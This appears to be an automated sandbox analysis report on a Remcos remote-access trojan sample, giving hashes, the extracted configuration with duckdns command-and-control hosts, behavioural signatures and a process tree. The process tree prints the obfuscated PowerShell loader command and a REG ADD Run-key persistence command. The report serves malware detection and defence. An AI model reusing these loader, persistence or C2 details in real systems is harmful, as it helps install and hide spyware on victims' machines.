Analysis
-
max time kernel
150s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
15-11-2024 20:00
Static task
static1
Behavioral task
behavioral1
Sample
85502e59a1632b69b489891356d31f6a06d788073c744e1ac55bd03f166c5241.exe
Resource
win7-20240903-en
General
-
Target
85502e59a1632b69b489891356d31f6a06d788073c744e1ac55bd03f166c5241.exe
-
Size
677KB
-
MD5
3b72f732f216136775f6aebdbda1ba0b
-
SHA1
f64deba6e108c2690a1f10ac0cd1a530cf3d16f8
-
SHA256
85502e59a1632b69b489891356d31f6a06d788073c744e1ac55bd03f166c5241
-
SHA512
8df9b062f2d82724fe186d18f30f2896eb93a591a38d5be33fcfb922722864c9f2b8a9324457b4eb41be1c08a546cd16b8319a0bfe41c81b1c0101f182804945
-
SSDEEP
12288:g+/D317UULVEwJP85xXtN1TrlHoACk9tclfmD/Q+6YTWiEOcW7scrzk:7DxUbXH1VIk+ubQ+DP8W77Pk
Malware Config
Extracted
remcos
Fresh
lafours8tursot1.duckdns.org:2879
lafours8tursot1.duckdns.org:2889
lafours8tursot2.duckdns.org:2879
lafours8tursot3.duckdns.org:2879
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
true
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
ioeoest.dat
-
keylog_flag
false
-
mouse_option
false
-
mutex
iomdjtru-ZWTOJI
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos family
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Troolie = "%Sanguivorous% -windowstyle 1 $Heptacolic=(gp -Path 'HKCU:\\Software\\Biledes\\').Scripturalizes;%Sanguivorous% ($Heptacolic)" reg.exe -
Blocklisted process makes network request 64 IoCs
Processes:
msiexec.exeflow pid process 34 3796 msiexec.exe 36 3796 msiexec.exe 38 3796 msiexec.exe 40 3796 msiexec.exe 42 3796 msiexec.exe 46 3796 msiexec.exe 47 3796 msiexec.exe 50 3796 msiexec.exe 52 3796 msiexec.exe 53 3796 msiexec.exe 54 3796 msiexec.exe 56 3796 msiexec.exe 57 3796 msiexec.exe 58 3796 msiexec.exe 59 3796 msiexec.exe 60 3796 msiexec.exe 61 3796 msiexec.exe 63 3796 msiexec.exe 64 3796 msiexec.exe 67 3796 msiexec.exe 69 3796 msiexec.exe 70 3796 msiexec.exe 71 3796 msiexec.exe 73 3796 msiexec.exe 74 3796 msiexec.exe 75 3796 msiexec.exe 76 3796 msiexec.exe 77 3796 msiexec.exe 78 3796 msiexec.exe 80 3796 msiexec.exe 81 3796 msiexec.exe 82 3796 msiexec.exe 83 3796 msiexec.exe 84 3796 msiexec.exe 85 3796 msiexec.exe 87 3796 msiexec.exe 88 3796 msiexec.exe 89 3796 msiexec.exe 90 3796 msiexec.exe 91 3796 msiexec.exe 92 3796 msiexec.exe 94 3796 msiexec.exe 95 3796 msiexec.exe 96 3796 msiexec.exe 97 3796 msiexec.exe 98 3796 msiexec.exe 99 3796 msiexec.exe 101 3796 msiexec.exe 102 3796 msiexec.exe 103 3796 msiexec.exe 104 3796 msiexec.exe 105 3796 msiexec.exe 106 3796 msiexec.exe 110 3796 msiexec.exe 114 3796 msiexec.exe 115 3796 msiexec.exe 117 3796 msiexec.exe 118 3796 msiexec.exe 119 3796 msiexec.exe 121 3796 msiexec.exe 122 3796 msiexec.exe 123 3796 msiexec.exe 124 3796 msiexec.exe 125 3796 msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
Processes:
msiexec.exepid process 3796 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
Powershell.exemsiexec.exepid process 1092 Powershell.exe 3796 msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
85502e59a1632b69b489891356d31f6a06d788073c744e1ac55bd03f166c5241.exePowershell.exemsiexec.execmd.exereg.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 85502e59a1632b69b489891356d31f6a06d788073c744e1ac55bd03f166c5241.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 7 IoCs
Processes:
Powershell.exepid process 1092 Powershell.exe 1092 Powershell.exe 1092 Powershell.exe 1092 Powershell.exe 1092 Powershell.exe 1092 Powershell.exe 1092 Powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
Powershell.exepid process 1092 Powershell.exe -
Suspicious use of AdjustPrivilegeToken 22 IoCs
Processes:
Powershell.exedescription pid process Token: SeDebugPrivilege 1092 Powershell.exe Token: SeIncreaseQuotaPrivilege 1092 Powershell.exe Token: SeSecurityPrivilege 1092 Powershell.exe Token: SeTakeOwnershipPrivilege 1092 Powershell.exe Token: SeLoadDriverPrivilege 1092 Powershell.exe Token: SeSystemProfilePrivilege 1092 Powershell.exe Token: SeSystemtimePrivilege 1092 Powershell.exe Token: SeProfSingleProcessPrivilege 1092 Powershell.exe Token: SeIncBasePriorityPrivilege 1092 Powershell.exe Token: SeCreatePagefilePrivilege 1092 Powershell.exe Token: SeBackupPrivilege 1092 Powershell.exe Token: SeRestorePrivilege 1092 Powershell.exe Token: SeShutdownPrivilege 1092 Powershell.exe Token: SeDebugPrivilege 1092 Powershell.exe Token: SeSystemEnvironmentPrivilege 1092 Powershell.exe Token: SeRemoteShutdownPrivilege 1092 Powershell.exe Token: SeUndockPrivilege 1092 Powershell.exe Token: SeManageVolumePrivilege 1092 Powershell.exe Token: 33 1092 Powershell.exe Token: 34 1092 Powershell.exe Token: 35 1092 Powershell.exe Token: 36 1092 Powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
msiexec.exepid process 3796 msiexec.exe -
Suspicious use of WriteProcessMemory 13 IoCs
Processes:
85502e59a1632b69b489891356d31f6a06d788073c744e1ac55bd03f166c5241.exePowershell.exemsiexec.execmd.exedescription pid process target process PID 836 wrote to memory of 1092 836 85502e59a1632b69b489891356d31f6a06d788073c744e1ac55bd03f166c5241.exe Powershell.exe PID 836 wrote to memory of 1092 836 85502e59a1632b69b489891356d31f6a06d788073c744e1ac55bd03f166c5241.exe Powershell.exe PID 836 wrote to memory of 1092 836 85502e59a1632b69b489891356d31f6a06d788073c744e1ac55bd03f166c5241.exe Powershell.exe PID 1092 wrote to memory of 3796 1092 Powershell.exe msiexec.exe PID 1092 wrote to memory of 3796 1092 Powershell.exe msiexec.exe PID 1092 wrote to memory of 3796 1092 Powershell.exe msiexec.exe PID 1092 wrote to memory of 3796 1092 Powershell.exe msiexec.exe PID 3796 wrote to memory of 1396 3796 msiexec.exe cmd.exe PID 3796 wrote to memory of 1396 3796 msiexec.exe cmd.exe PID 3796 wrote to memory of 1396 3796 msiexec.exe cmd.exe PID 1396 wrote to memory of 876 1396 cmd.exe reg.exe PID 1396 wrote to memory of 876 1396 cmd.exe reg.exe PID 1396 wrote to memory of 876 1396 cmd.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\85502e59a1632b69b489891356d31f6a06d788073c744e1ac55bd03f166c5241.exe"C:\Users\Admin\AppData\Local\Temp\85502e59a1632b69b489891356d31f6a06d788073c744e1ac55bd03f166c5241.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:836 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe"Powershell.exe" -windowstyle minimized "$Zieglers = Get-Content -raw 'C:\Users\Admin\AppData\Roaming\Lysninger28\grdesanger\Hjlpemenuen104.Gen192' ; $Bibbling=$Zieglers.SubString(77179,3);.$Bibbling($Zieglers)2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1092 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3796 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Troolie" /t REG_EXPAND_SZ /d "%Sanguivorous% -windowstyle 1 $Heptacolic=(gp -Path 'HKCU:\Software\Biledes\').Scripturalizes;%Sanguivorous% ($Heptacolic)"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1396 -
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Troolie" /t REG_EXPAND_SZ /d "%Sanguivorous% -windowstyle 1 $Heptacolic=(gp -Path 'HKCU:\Software\Biledes\').Scripturalizes;%Sanguivorous% ($Heptacolic)"5⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:876
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
423KB
MD51b559621122c1b9255e77e86c8fbe290
SHA11a803f1663eb48db7aedc8606feb64cca0928132
SHA25630edde04845cf5971cd2acae8685ca9513ee34595ded8a566c37c7f87ba34614
SHA5124b321218f3c3487992d6a2e50b69d5cdd248a43e89ca12366f962493a547699c7564e57a67ca4aacb588bf38d98a5152b2d20d122f9616319c71838a98fd078f
-
Filesize
75KB
MD5320c79f6479491da5f91192e301648f6
SHA148664b2465180bbd3c4d3e92abeb5bcd3cc29bfd
SHA25657f6b2ee227e10b1fae852528583fa97c9af97ccc7bc4f93fdda7aa4f8ca127d
SHA512c5403831808634c94bae13a21397dd42a8dfbf24d4272684afb1c49f90b888312f01f1efde32b2a4e0424ce6d76249e3be85c9e5baa02ea06fd3bebc31c4434f